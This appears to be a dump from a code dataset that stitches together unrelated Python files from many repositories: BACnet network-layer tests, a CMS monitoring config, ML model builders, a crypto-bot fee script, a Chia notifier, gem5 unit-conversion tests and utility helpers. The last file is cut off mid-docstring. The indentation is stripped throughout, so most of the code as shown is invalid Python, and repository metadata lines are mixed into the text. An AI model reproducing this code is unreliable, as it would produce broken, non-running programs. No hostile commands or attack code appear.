"""
def __init__(self):
if _debug: TNetwork2._debug("__init__")
StateMachineGroup.__init__(self)
# reset the time machine
reset_time_machine()
if _debug: TNetwork2._debug(" - time machine reset")
# create a traffic log
self.traffic_log = TrafficLog()
# implementation under test
self.iut1 = RouterNode() # router from vlan1 to vlan2
self.iut2 = RouterNode() # router from vlan2 to vlan3
# make a little LAN
self.vlan1 = Network(name="vlan1", broadcast_address=LocalBroadcast())
self.vlan1.traffic_log = self.traffic_log
# sniffer node
self.sniffer1 = NetworkLayerStateMachine("1", self.vlan1)
self.append(self.sniffer1)
# connect vlan1 to iut1
self.iut1.add_network("2", self.vlan1, 1)
# make another little LAN
self.vlan2 = Network(name="vlan2", broadcast_address=LocalBroadcast())
self.vlan2.traffic_log = self.traffic_log
# test device
self.td = NetworkLayerStateMachine("3", self.vlan2)
self.append(self.td)
# sniffer node
self.sniffer2 = NetworkLayerStateMachine("4", self.vlan2)
self.append(self.sniffer2)
# connect vlan2 to both routers
self.iut1.add_network("5", self.vlan2, None) ### NOT CONFIGURED
self.iut2.add_network("6", self.vlan2, 2)
# make another little LAN
self.vlan3 = Network(name="vlan3", broadcast_address=LocalBroadcast())
self.vlan3.traffic_log = self.traffic_log
# sniffer node
self.sniffer3 = NetworkLayerStateMachine("7", self.vlan3)
self.append(self.sniffer3)
# connect vlan3 to the second router
self.iut2.add_network("8", self.vlan3, 3)
if _debug:
TNetwork2._debug(" - iut1.nsap: %r", self.iut1.nsap)
TNetwork2._debug(" - iut2.nsap: %r", self.iut2.nsap)
def run(self, time_limit=60.0):
if _debug: TNetwork2._debug("run %r", time_limit)
# run the group
super(TNetwork2, self).run()
# run it for some time
run_time_machine(time_limit)
if _debug:
TNetwork2._debug(" - time machine finished")
# list the state machines which shows their current state
for state_machine in self.state_machines:
TNetwork2._debug(" - machine: %r", state_machine)
# each one has a list of sent/received pdus
for direction, pdu in state_machine.transaction_log:
TNetwork2._debug(" %s %s %s",
direction,
pdu.pduSource or pdu.pduDestination,
pdu.__class__.__name__,
)
# traffic log has what was processed on each vlan
self.traffic_log.dump(TNetwork2._debug)
# check for success
all_success, some_failed = super(TNetwork2, self).check_for_success()
assert all_success
@bacpypes_debugging
class TestSimple(unittest.TestCase):
def test_idle(self):
"""Test an idle network, nothing happens is success."""
if _debug: TestSimple._debug("test_idle")
# create a network
tnet = TNetwork1()
# all start states are successful
tnet.td.start_state.success()
tnet.sniffer1.start_state.success()
tnet.sniffer2.start_state.success()
tnet.sniffer3.start_state.success()
# run the group
tnet.run()
@bacpypes_debugging
class TestNetworkNumberIs(unittest.TestCase):
def test_1(self):
"""Test broadcasts from a router."""
if _debug: TestNetworkNumberIs._debug("test_1")
# create a network
tnet = TNetwork1()
# tell the IUT to send what it knows
deferred(tnet.iut1.nse.network_number_is)
# TD sees same traffic as sniffer2
tnet.td.start_state.success()
# network 1 sees router from 1 to 2
tnet.sniffer1.start_state.doc("1-1-0") \
.receive(NetworkNumberIs,
nniNet=1,
nniFlag=1,
).doc("1-1-1") \
.success()
# network 2 sees router from 2 to 1
tnet.sniffer2.start_state.doc("1-2-0") \
.receive(NetworkNumberIs,
nniNet=2,
nniFlag=1,
).doc("1-2-1") \
.success()
# network 3 sees nothing, message isn't routed
tnet.sniffer3.start_state.doc("1-3-0") \
.timeout(10).doc("1-3-1") \
.success()
# run the group
tnet.run()
def test_2(self):
"""Test router response to queries."""
if _debug: TestNetworkNumberIs._debug("test_2")
# create a network
tnet = TNetwork1()
# test device broadcasts a request for the network number
s211 = tnet.td.start_state.doc("2-1-0") \
.send(WhatIsNetworkNumber(
destination=LocalBroadcast(),
)).doc("2-1-1") \
# test device sees both responses
both = s211 \
.receive(NetworkNumberIs,
pduSource=Address(5),
nniNet=2,
nniFlag=1,
).doc("2-1-2-a") \
.receive(NetworkNumberIs,
pduSource=Address(6),
nniNet=2,
nniFlag=1,
).doc("2-1-2-b") \
# allow the two packets in either order
s211.receive(NetworkNumberIs,
pduSource=Address(6),
nniNet=2,
nniFlag=1,
).doc("2-1-2-c") \
.receive(NetworkNumberIs,
pduSource=Address(5),
nniNet=2,
nniFlag=1,
next_state=both,
).doc("2-1-2-d") \
# fail if anything is received after both packets
both.timeout(3).doc("2-1-3") \
.success()
# short circuit sniffers
tnet.sniffer1.start_state.success()
tnet.sniffer2.start_state.success()
tnet.sniffer3.start_state.success()
# run the group
tnet.run()
def test_3(self):
"""Test broadcasts from a router."""
if _debug: TestNetworkNumberIs._debug("test_3")
# create a network
tnet = TNetwork2()
# tell the IUT to send what it knows
deferred(tnet.iut1.nse.network_number_is)
# TD sees same traffic as sniffer2
tnet.td.start_state.success()
# network 1 sees router from 1 to 2
tnet.sniffer1.start_state.doc("3-1-0") \
.receive(NetworkNumberIs,
nniNet=1,
nniFlag=1,
).doc("3-1-1") \
.success()
# network 2 sees nothing
tnet.sniffer2.start_state.doc("3-2-0") \
.timeout(10).doc("3-2-1") \
.success()
# network 3 sees nothing
tnet.sniffer3.start_state.doc("3-3-0") \
.timeout(10).doc("3-3-1") \
.success()
# run the group
tnet.run()
def test_4(self):
"""Test router response to queries."""
if _debug: TestNetworkNumberIs._debug("test_4")
# create a network
tnet = TNetwork2()
def iut1_knows_net(net):
assert net in tnet.iut1.nsap.adapters
# test device sends request, receives one response
tnet.td.start_state.doc("4-1-0") \
.call(iut1_knows_net, None).doc("4-1-1") \
.send(WhatIsNetworkNumber(
destination=LocalBroadcast(),
)).doc("4-1-2") \
.receive(NetworkNumberIs,
pduSource=Address(6),
nniNet=2,
nniFlag=1,
).doc("4-1-3") \
.timeout(3).doc("4-1-4") \
.call(iut1_knows_net, 2).doc("4-1-5") \
.success()
# short circuit sniffers
tnet.sniffer1.start_state.success()
tnet.sniffer2.start_state.success()
tnet.sniffer3.start_state.success()
# run the group
tnet.run()
def test_5(self):
"""Test router response to queries."""
if _debug: TestNetworkNumberIs._debug("test_5")
# create a network
tnet = TNetwork2()
# tell the IUT2 to send what it knows
deferred(tnet.iut2.nse.network_number_is)
# test device receives announcement from IUT2, requests network
# number from IUT1, receives announcement from IUT1 with the
# network learned
tnet.td.start_state.doc("5-1-0") \
.receive(NetworkNumberIs,
pduSource=Address(6),
nniNet=2,
nniFlag=1,
).doc("5-1-1") \
.send(WhatIsNetworkNumber(
destination=Address(5),
)).doc("5-1-2") \
.receive(NetworkNumberIs,
pduSource=Address(5),
nniNet=2,
nniFlag=0,
).doc("5-1-3") \
.timeout(3).doc("5-1-4") \
.success()
# short circuit sniffers
tnet.sniffer1.start_state.success()
tnet.sniffer2.start_state.success()
tnet.sniffer3.start_state.success()
# run the group
tnet.run()
|
DQM/SiStripMonitorPedestals/python/SiStripMonitorRawData_cfi.py | ckamtsikis/cmssw | 852 | 12715773 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
RawDataMon = DQMEDAnalyzer('SiStripMonitorRawData',
OutputMEsInRootFile = cms.bool(False),
DigiProducer = cms.string('siStripDigis'),
OutputFileName = cms.string('SiStripRawData.root')
)
|
api/curve/v1/models/__init__.py | QiliangFan/Baidu-Curve | 478 | 12715795 | # -*- coding: utf-8 -*-
"""
Models
~~~~
:copyright: (c) 2017-2018 by Baidu, Inc.
:license: Apache, see LICENSE for more details.
"""
from .data_abstract import DataAbstract
from .raw import Raw
from .point import Point
from .thumb import Thumb
from .band_item import BandItem
from .user import User
|
demos/cta_step_by_step/04_DataKit.py | NoTravel/wtpy | 164 | 12715803 | <gh_stars>100-1000
# 1. Configure 04_DataKit/config.ini
# 2. Run: python 04_DataKit.py
# 3. The program automatically generates Common/commodities.json and Common/contracts.json
# 4. Note that simnow only works during market trading hours
# todo: statemonitor.json is hard-coded and cannot be moved into the config directory yet; waiting for upstream support
# todo: code:"CFFEX.T.HOT" or code:"CFFEX.T" is not supported yet; waiting for upstream support
from wtpy import WtDtEngine
if __name__ == "__main__":
    # Create a runtime environment and add the strategy
env = WtDtEngine()
env.initialize("./04_DataKit/dtcfg.json", "./04_DataKit/logcfgdt.json")
env.run()
kw = input('press any key to exit\n') |
models/image_models_test.py | google-research/pathdreamer | 115 | 12715890 | <reponame>google-research/pathdreamer
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for pathdreamer.models.image_models."""
import itertools
from absl.testing import parameterized
from pathdreamer.models import image_models
import tensorflow as tf
class ImageModelsTest(tf.test.TestCase, parameterized.TestCase):
"""Tests on the image_models file."""
@parameterized.parameters(list(itertools.product((1, 2), (128, 256), (41,))))
def test_model_output(self, batch_size, image_size, channels):
"""Tests that encoder / decoder outputs correct shapes."""
test_input = tf.random.uniform(
(batch_size, image_size, image_size, channels),
maxval=1,
dtype=tf.int32)
test_input = tf.cast(test_input, tf.float32)
hidden_dims = 8
test_encoder = image_models.ResNetEncoder(image_size=image_size,
hidden_dims=hidden_dims,
resnet_version='50')
test_decoder = image_models.ResNetDecoder(
image_size=image_size,
hidden_dims=hidden_dims,
output_dim=channels,
resnet_version='50')
test_encoder_output, test_skip = test_encoder(test_input)
# Encoder output should be a vector of shape (N, output_dim).
self.assertEqual(test_encoder_output.shape[0], batch_size)
self.assertLen(test_encoder_output.shape, 2)
tiled_encoder_output = test_encoder_output[:, None, None, :]
test_decoder_output = test_decoder(tiled_encoder_output, test_skip)
# Decoder output should be equal to input shape.
self.assertEqual(test_decoder_output.shape, test_input.shape)
if __name__ == '__main__':
tf.test.main()
|
script-get_fees.py | dthevenin/pycryptobot | 1,447 | 12715917 | <filename>script-get_fees.py
from models.PyCryptoBot import PyCryptoBot
from models.exchange.binance import AuthAPI as BAuthAPI
from models.exchange.coinbase_pro import AuthAPI as CAuthAPI
# Coinbase Pro fees
app = PyCryptoBot(exchange='coinbasepro')
api = CAuthAPI(app.getAPIKey(), app.getAPISecret(), app.getAPIPassphrase(), app.getAPIURL())
#print (api.getTakerFee())
#print (api.getTakerFee('BTC-GBP'))
#print (api.getMakerFee())
#print (api.getMakerFee('BTC-GBP'))
#print (api.getFees('BTCGBP'))
#print (api.getFees())
print (app.getMakerFee())
print (app.getTakerFee())
# Binance fees
app = PyCryptoBot(exchange='binance')
api = BAuthAPI(app.getAPIKey(), app.getAPISecret(), app.getAPIURL())
#print (api.getTakerFee())
#print (api.getTakerFee('BTCGBP'))
#print (api.getMakerFee())
#print (api.getMakerFee('BTCGBP'))
#print (api.getFees('BTCGBP'))
#print (api.getFees())
print (app.getMakerFee())
print (app.getTakerFee()) |
pycls/core/builders.py | KelvinYang0320/nas-without-training | 385 | 12715998 | <filename>pycls/core/builders.py<gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Model and loss construction functions."""
import torch
from pycls.core.config import cfg
from pycls.models.anynet import AnyNet
from pycls.models.effnet import EffNet
from pycls.models.regnet import RegNet
from pycls.models.resnet import ResNet
from pycls.models.nas.nas import NAS
from pycls.models.nas.nas_search import NAS_Search
from pycls.models.nas_bench.model_builder import NAS_Bench
class LabelSmoothedCrossEntropyLoss(torch.nn.Module):
"""CrossEntropyLoss with label smoothing."""
def __init__(self):
super(LabelSmoothedCrossEntropyLoss, self).__init__()
self.eps = cfg.MODEL.LABEL_SMOOTHING_EPS
self.num_classes = cfg.MODEL.NUM_CLASSES
def forward(self, logits, target):
pred = logits.log_softmax(dim=-1)
with torch.no_grad():
target_dist = torch.ones_like(pred) * self.eps / (self.num_classes - 1)
target_dist.scatter_(-1, target.unsqueeze(-1), 1 - self.eps)
return (-target_dist * pred).sum(dim=-1).mean()
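# Minimal usage sketch (illustrative only): the loss takes raw logits of shape
# (N, C) and integer class targets of shape (N,); it assumes that
# cfg.MODEL.NUM_CLASSES and cfg.MODEL.LABEL_SMOOTHING_EPS are already configured.
def _example_label_smoothed_loss(batch_size=8):
    loss_fun = LabelSmoothedCrossEntropyLoss()
    logits = torch.randn(batch_size, cfg.MODEL.NUM_CLASSES)
    target = torch.randint(0, cfg.MODEL.NUM_CLASSES, (batch_size,))
    return loss_fun(logits, target)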
# Supported models
_models = {
"anynet": AnyNet,
"effnet": EffNet,
"resnet": ResNet,
"regnet": RegNet,
"nas": NAS,
"nas_search": NAS_Search,
"nas_bench": NAS_Bench,
}
# Supported loss functions
_loss_funs = {
"cross_entropy": torch.nn.CrossEntropyLoss,
"label_smoothed_cross_entropy": LabelSmoothedCrossEntropyLoss,
}
def get_model():
"""Gets the model class specified in the config."""
err_str = "Model type '{}' not supported"
assert cfg.MODEL.TYPE in _models.keys(), err_str.format(cfg.MODEL.TYPE)
return _models[cfg.MODEL.TYPE]
def get_loss_fun():
"""Gets the loss function class specified in the config."""
err_str = "Loss function type '{}' not supported"
    assert cfg.MODEL.LOSS_FUN in _loss_funs.keys(), err_str.format(cfg.MODEL.LOSS_FUN)
return _loss_funs[cfg.MODEL.LOSS_FUN]
def build_model():
"""Builds the model."""
return get_model()()
def build_loss_fun():
"""Build the loss function."""
if cfg.TASK == "seg":
return get_loss_fun()(ignore_index=255)
else:
return get_loss_fun()()
def register_model(name, ctor):
"""Registers a model dynamically."""
_models[name] = ctor
def register_loss_fun(name, ctor):
"""Registers a loss function dynamically."""
_loss_funs[name] = ctor
|
src/notifier/script_notifier.py | Umiiii/chiadog | 503 | 12715999 | # std
import logging
import os
import subprocess
from typing import List
# project
from . import Notifier, Event
class ScriptNotifier(Notifier):
def __init__(self, title_prefix: str, config: dict):
logging.info("Initializing script notifier.")
super().__init__(title_prefix, config)
try:
self.script_path = config["script_path"]
except KeyError as key:
logging.error(f"Invalid config.yaml. Missing key: {key}")
if self.script_path:
if os.path.isfile(self.script_path):
if os.access(self.script_path, os.X_OK) is False:
logging.error(f"Invalid script path. File is not executable: {self.script_path}")
else:
logging.error(f"Invalid script path. File does not exist: {self.script_path}")
self.script_path = None
def send_events_to_user(self, events: List[Event]) -> bool:
if self.script_path is None:
return False
for event in events:
if event.type in self._notification_types and event.service in self._notification_services:
subprocess.run([str(self.script_path), event.priority.name, event.service.name, event.message])
return True
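# Illustrative configuration sketch (assumed values): only "script_path" is read
# in this class; the base Notifier class may require additional keys, and the
# path below is a hypothetical placeholder.
#
#   notifier = ScriptNotifier("Chiadog", {"script_path": "/usr/local/bin/notify.sh", ...})
#   notifier.send_events_to_user(events)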
|
tests/utils.py | PSSF23/graspologic | 148 | 12716017 | # Copyright (c) Microsoft Corporation and contributors.
# Licensed under the MIT License.
import os
def data_file(filename):
return os.path.join(os.path.dirname(__file__), "test_data", filename)
|
src/garage/sampler/__init__.py | blacksph3re/garage | 1,500 | 12716048 | """Samplers which run agents in environments."""
# yapf: disable
from garage.sampler._dtypes import InProgressEpisode
from garage.sampler._functions import _apply_env_update
from garage.sampler.default_worker import DefaultWorker
from garage.sampler.env_update import (EnvUpdate,
ExistingEnvUpdate,
NewEnvUpdate,
SetTaskUpdate)
from garage.sampler.fragment_worker import FragmentWorker
from garage.sampler.local_sampler import LocalSampler
from garage.sampler.multiprocessing_sampler import MultiprocessingSampler
from garage.sampler.ray_sampler import RaySampler
from garage.sampler.sampler import Sampler
from garage.sampler.vec_worker import VecWorker
from garage.sampler.worker import Worker
from garage.sampler.worker_factory import WorkerFactory
# yapf: enable
__all__ = [
'_apply_env_update',
'InProgressEpisode',
'FragmentWorker',
'Sampler',
'LocalSampler',
'RaySampler',
'MultiprocessingSampler',
'VecWorker',
'WorkerFactory',
'Worker',
'DefaultWorker',
'EnvUpdate',
'NewEnvUpdate',
'SetTaskUpdate',
'ExistingEnvUpdate',
]
|
lib/hachoir/core/language.py | 0x20Man/Watcher3 | 320 | 12716086 | <filename>lib/hachoir/core/language.py
import functools
from hachoir.core.iso639 import ISO639_2
@functools.total_ordering
class Language:
def __init__(self, code):
code = str(code)
if code not in ISO639_2:
raise ValueError("Invalid language code: %r" % code)
self.code = code
def __eq__(self, other):
if other.__class__ != Language:
return NotImplemented
return self.code == other.code
def __lt__(self, other):
if other.__class__ != Language:
return NotImplemented
return self.code < other.code
def __str__(self):
return ISO639_2[self.code]
def __repr__(self):
return "<Language '%s', code=%r>" % (str(self), self.code)
|
tests/pyunit/util/pyunit_convert_check.py | hyu-iot/gem5 | 765 | 12716103 | <filename>tests/pyunit/util/pyunit_convert_check.py
#!/usr/bin/env python3
#
# Copyright (c) 2021 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from m5.util import convert
def _ip(*args):
return (args[0] << 24) | (args[1] << 16) | (args[2] << 8) | args[3]
class ConvertTestSuite(unittest.TestCase):
"""Test cases for unit conversion"""
def test_toMetricFloat(self):
def conv(x):
return convert.toMetricFloat(x, 'value', 'X')
self.assertEqual(conv('42'), 42e0)
self.assertEqual(conv('42.5'), 42.5e0)
self.assertEqual(conv('42kX'), 42e3)
self.assertEqual(conv('42.5kX'), 42.5e3)
self.assertEqual(conv('42MX'), 42e6)
self.assertEqual(conv('42GX'), 42e9)
self.assertEqual(conv('42TX'), 42e12)
self.assertEqual(conv('42PX'), 42e15)
self.assertEqual(conv('42EX'), 42e18)
self.assertEqual(conv('42KiX'), 42 * 2**10)
self.assertEqual(conv('42MiX'), 42 * 2**20)
self.assertEqual(conv('42GiX'), 42 * 2**30)
self.assertEqual(conv('42TiX'), 42 * 2**40)
self.assertEqual(conv('42PiX'), 42 * 2**50)
self.assertEqual(conv('42EiX'), 42 * 2**60)
self.assertRaises(ValueError, conv, '42k')
self.assertRaises(ValueError, conv, '42KX')
self.assertRaises(ValueError, conv, '42kiX')
self.assertEqual(convert.toMetricFloat('42'), 42)
# Prefixes not allowed without a unit
self.assertRaises(ValueError, convert.toMetricFloat, '42k')
def test_toMetricInteger(self):
def conv(x):
return convert.toMetricInteger(x, 'value', 'X')
self.assertEqual(conv('42'), 42 * 10**0)
self.assertEqual(conv('42kX'), 42 * 10**3)
self.assertEqual(conv('42MX'), 42 * 10**6)
self.assertEqual(conv('42GX'), 42 * 10**9)
self.assertEqual(conv('42TX'), 42 * 10**12)
self.assertEqual(conv('42PX'), 42 * 10**15)
self.assertEqual(conv('42EX'), 42 * 10**18)
self.assertEqual(conv('42KiX'), 42 * 2**10)
self.assertEqual(conv('42MiX'), 42 * 2**20)
self.assertEqual(conv('42GiX'), 42 * 2**30)
self.assertEqual(conv('42TiX'), 42 * 2**40)
self.assertEqual(conv('42PiX'), 42 * 2**50)
self.assertEqual(conv('42EiX'), 42 * 2**60)
self.assertRaises(ValueError, conv, '42.1')
self.assertRaises(ValueError, conv, '42.1kX')
self.assertRaises(ValueError, conv, '42k')
self.assertRaises(ValueError, conv, '42KX')
self.assertRaises(ValueError, conv, '42kiX')
self.assertEqual(convert.toMetricInteger('42'), 42)
# Prefixes not allowed without a unit
self.assertRaises(ValueError, convert.toMetricInteger, '42k')
def test_toBool(self):
conv = convert.toBool
self.assertEqual(conv('TRUE'), True)
self.assertEqual(conv('true'), True)
self.assertEqual(conv('t'), True)
self.assertEqual(conv('yes'), True)
self.assertEqual(conv('y'), True)
self.assertEqual(conv('1'), True)
self.assertEqual(conv('FALSE'), False)
self.assertEqual(conv('false'), False)
self.assertEqual(conv('f'), False)
self.assertEqual(conv('no'), False)
self.assertEqual(conv('n'), False)
self.assertEqual(conv('0'), False)
self.assertRaises(ValueError, conv, 'not a bool')
self.assertRaises(ValueError, conv, '2')
def test_toFrequency(self):
conv = convert.toFrequency
self.assertEqual(conv('42'), 42.0)
self.assertEqual(conv('42Hz'), 42)
self.assertEqual(conv('42kHz'), 42e3)
# Prefixes need a unit
self.assertRaises(ValueError, conv, '42k')
# Seconds isn't a valid unit unless using anyToFrequency.
self.assertRaises(ValueError, conv, '42s')
def test_toLatency(self):
conv = convert.toLatency
self.assertEqual(conv('42'), 42.0)
self.assertEqual(conv('42s'), 42.0)
# We allow prefixes for seconds.
self.assertEqual(conv('42ks'), 42e3)
        # Prefixes need a unit
self.assertRaises(ValueError, conv, '42k')
# Hz shouldn't be converted unless using anyToLatency
self.assertRaises(ValueError, conv, '42Hz')
def test_anyToLatency(self):
conv = convert.anyToLatency
self.assertEqual(conv('42s'), 42.0)
# We currently allow prefixes for seconds.
self.assertEqual(conv('42ks'), 42e3)
self.assertEqual(conv('10Hz'), 0.1)
self.assertEqual(conv('1kHz'), 1e-3)
self.assertRaises(ValueError, conv, '42k')
self.assertRaises(ValueError, conv, '42')
def test_anyToFrequency(self):
conv = convert.anyToFrequency
self.assertEqual(conv('42kHz'), 42e3)
self.assertEqual(conv('0.1s'), 10.0)
self.assertEqual(conv('1ms'), 1000.0)
self.assertRaises(ValueError, conv, '42k')
self.assertRaises(ValueError, conv, '42')
def test_toNetworkBandwidth(self):
conv = convert.toNetworkBandwidth
self.assertEqual(conv('42'), 42.0)
self.assertEqual(conv('42bps'), 42.0)
self.assertEqual(conv('42kbps'), 42e3)
self.assertRaises(ValueError, conv, '42Kbps')
def test_toMemoryBandwidth(self):
conv = convert.toMemoryBandwidth
self.assertEqual(conv('42'), 42.0)
self.assertEqual(conv('42B/s'), 42.0)
self.assertEqual(conv('42MB/s'), 42 * 2 ** 20)
self.assertEqual(conv('42MiB/s'), 42 * 2 ** 20)
self.assertRaises(ValueError, conv, '42KB/s')
self.assertRaises(ValueError, conv, '42Mi')
def test_toMemorySize(self):
conv = convert.toMemorySize
self.assertEqual(conv('42'), 42.0)
self.assertEqual(conv('42B'), 42.0)
self.assertEqual(conv('42kB'), 42 * 2**10)
self.assertEqual(conv('42MB'), 42 * 2**20)
self.assertEqual(conv('42KiB'), 42 * 2**10)
self.assertEqual(conv('42MiB'), 42 * 2**20)
def test_toIpAddress(self):
conv = convert.toIpAddress
self.assertEqual(conv("255.255.255.255"), _ip(255, 255, 255, 255))
self.assertEqual(conv("1.2.3.4"), _ip(1, 2, 3, 4))
self.assertRaises(TypeError, conv, 0)
self.assertRaises(ValueError, conv, "0.0.0")
self.assertRaises(ValueError, conv, "0.0.0.300")
self.assertRaises(ValueError, conv, "0.0.0.0.0")
def test_toIpNetmask(self):
conv = convert.toIpNetmask
self.assertEqual(conv("1.2.3.4/24"), (_ip(1, 2, 3, 4), 24))
self.assertEqual(conv("1.2.3.4/255.255.255.0"),
(_ip(1, 2, 3, 4), 24))
self.assertEqual(conv("1.2.3.4/0"), (_ip(1, 2, 3, 4), 0))
self.assertEqual(conv("1.2.3.4/0.0.0.0"),
(_ip(1, 2, 3, 4), 0))
self.assertRaises(ValueError, conv, "0.0.0.0")
self.assertRaises(ValueError, conv, "0.0.0.0/")
self.assertRaises(ValueError, conv, "0.0.0.0/64")
def test_toIpWithPort(self):
conv = convert.toIpWithPort
self.assertEqual(conv("1.2.3.4:42"), (_ip(1, 2, 3, 4), 42))
self.assertRaises(ValueError, conv, "0.0.0.0")
self.assertRaises(ValueError, conv, "0.0.0.0:")
self.assertRaises(ValueError, conv, "0.0.0.0:65536")
def test_toVoltage(self):
conv = convert.toVoltage
self.assertEqual(conv('42'), 42)
self.assertEqual(conv('42V'), 42)
self.assertEqual(conv('42kV'), 42e3)
def test_toCurrent(self):
conv = convert.toCurrent
self.assertEqual(conv('42'), 42)
self.assertEqual(conv('42A'), 42)
self.assertEqual(conv('42kA'), 42e3)
def test_toEnergy(self):
conv = convert.toEnergy
self.assertEqual(conv('42'), 42)
self.assertEqual(conv('42J'), 42)
self.assertEqual(conv('42kJ'), 42e3)
def test_temperature(self):
conv = convert.toTemperature
self.assertEqual(conv("1.0K"), 1.0)
self.assertEqual(conv("1.0mK"), 1.0e-3)
self.assertEqual(conv("0C"), 273.15)
self.assertEqual(conv("-1C"), 272.15)
self.assertRaises(ValueError, conv, "1.0")
self.assertRaises(ValueError, conv, "-1K")
self.assertEqual(conv("32F"), 273.15)
|
cooka/common/util.py | DataCanvasIO/Cooka | 222 | 12716156 | <filename>cooka/common/util.py
import datetime
import time
import six
from uuid import uuid4
import json
from json import JSONEncoder
import math
import re
from cooka.common import consts
from os import path as P
MAX_BUFFER_SIZE = 1024
UUID_CHARS = ("a", "b", "c", "d", "e", "f",
"g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s",
"t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5",
"6", "7", "8", "9", "A", "B", "C", "D", "E", "F", "G", "H", "I",
"J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V",
"W", "X", "Y", "Z")
def short_uuid():
uuid = str(uuid4()).replace('-', '')
result = ''
for i in range(0, 8):
sub = uuid[i * 4: i * 4 + 4]
x = int(sub, 16)
result += UUID_CHARS[x % 0x3E]
return result
def human_datetime(date=None):
if date is None:
date = datetime.datetime.now()
return date.strftime("%Y%m%d%H%M%S%f")
def human_std_datetime(date=None):
if date is None:
date = datetime.datetime.now()
return date.strftime("%Y-%m-%d %H:%M:%S")
def cut_suffix(file_name):
last_position = file_name.rfind('.')
if last_position > -1:
return file_name[:last_position]
else:
return file_name
def analyze_data_job_name(file_name, _datetime=None):
d = human_datetime(_datetime)
return f'job_analyze_{cut_suffix(file_name)}_{d}'
def predict_job_name(dataset_name, _datetime=None):
d = human_datetime(_datetime)
return f'job_predict_{cut_suffix(dataset_name)}_{d}'
def temporary_upload_file_path(filename):
return f'{consts.PATH_TMP_UPLOAD}/{short_uuid()}/{filename}'
def get_file_suffix(file_name):
last_position = file_name.rfind('.')
if last_position > -1:
return file_name[last_position:]
else:
raise NameError(f"File {file_name} has no suffix. ")
def human_data_size(value):
def r(v, unit):
return "%s%s" % (round(v, 2), unit)
if value < 1024 * 1024:
return r(value / 1024, "KB")
elif 1024 * 1024 < value <= 1024 * 1024 * 1024:
return r(value / 1024 / 1024, "MB")
else:
return r(value / 1024 / 1024 / 1024, "GB")
def get_now_datetime():
return datetime.datetime.now()
def get_now_long():
return round(time.time() * 1000)
def to_timestamp(d):
return round(d.timestamp()*1000)
class NaNEncoder(JSONEncoder):
def default(self, obj):
try:
_ = iter(obj)
except TypeError:
if isinstance(obj, float) and math.isnan(obj):
return "null"
elif isinstance(obj, datetime.datetime):
return to_timestamp(obj)
return JSONEncoder.default(self, obj)
def dumps(d, indent=4):
"""
    Prevent unicode issues when dumping to JSON (ensure_ascii=False).
:param d:
:return:
"""
import six
if six.PY2:
return json.dumps(d, ensure_ascii=False, encoding='utf-8', indent=indent, cls=NaNEncoder)
else:
return json.dumps(d, ensure_ascii=False, indent=indent, cls=NaNEncoder)
def dumps_bytes(d):
"""
    Prevent unicode issues when dumping to JSON bytes.
:param d:
:return:
"""
str_data = dumps(d)
return to_bytes(str_data)
def loads(s):
"""
    Prevent unicode issues when loading JSON.
:param s:
:return:
"""
d = json.loads(s)
return byteify(d)
def to_str(sv):
"""将unicode和python3中的字节转换成字符串。
Args:
sv(Union(bytes, unicode, object)): 字节、unicode或者其他类型的数据转换为字符串;
Returns:
str: 字符串数据。
"""
if six.PY2:
if isinstance(sv, unicode):
return sv.encode('utf-8')
else:
return str(sv)
    else:  # In Python 3 and above
if isinstance(sv, bytes):
return str(sv, encoding='utf-8')
else:
return str(sv)
def to_bytes(s):
"""将字符串转换为字节数组。
Args:
s (Union(str, unicode)): 需要转换为字节的数据,在python2中支持类型str和unicode;在py3中支持str。
Returns:
字节数据。
"""
if six.PY2:
        # In Python 2, str is already a byte array
if isinstance(s, unicode):
return s.encode('utf-8')
elif isinstance(s, str):
return s
else:
raise Exception("无法将类型%s转换为字节" % type(s).__name__)
    else:  # In Python 3 and above
if isinstance(s, str):
return bytes(s, encoding="utf-8")
elif isinstance(s, bytes):
return s
else:
raise Exception("无法将类型%s转换为字节" % type(s).__name__)
def byteify(s, encoding='utf-8'):
"""
